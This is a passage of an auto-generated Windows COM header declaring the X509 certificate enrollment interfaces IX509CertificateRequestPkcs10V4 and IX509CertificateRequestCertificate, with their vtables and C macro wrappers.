    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V4_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V4_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V4_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V4_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V4_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V4_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 


#define IX509CertificateRequestPkcs10V4_get_AttestPrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestPrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKey(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_AttestationEncryptionCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AttestationEncryptionCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestationEncryptionCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AttestationEncryptionCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ChallengePassword(This,pValue)	\
    ( (This)->lpVtbl -> get_ChallengePassword(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ChallengePassword(This,Value)	\
    ( (This)->lpVtbl -> put_ChallengePassword(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 


#define IX509CertificateRequestPkcs10V4_get_ClaimType(This,pValue)	\
    ( (This)->lpVtbl -> get_ClaimType(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ClaimType(This,Value)	\
    ( (This)->lpVtbl -> put_ClaimType(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_AttestPrivateKeyPreferred(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKeyPreferred(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestPrivateKeyPreferred(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKeyPreferred(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab343-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE CheckPublicKeySignature( 
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Issuer( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Issuer( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotBefore( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotBefore( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotAfter( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotAfter( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestCertificateVtbl;

    interface IX509CertificateRequestCertificate
    {
        CONST_VTBL struct IX509CertificateRequestCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

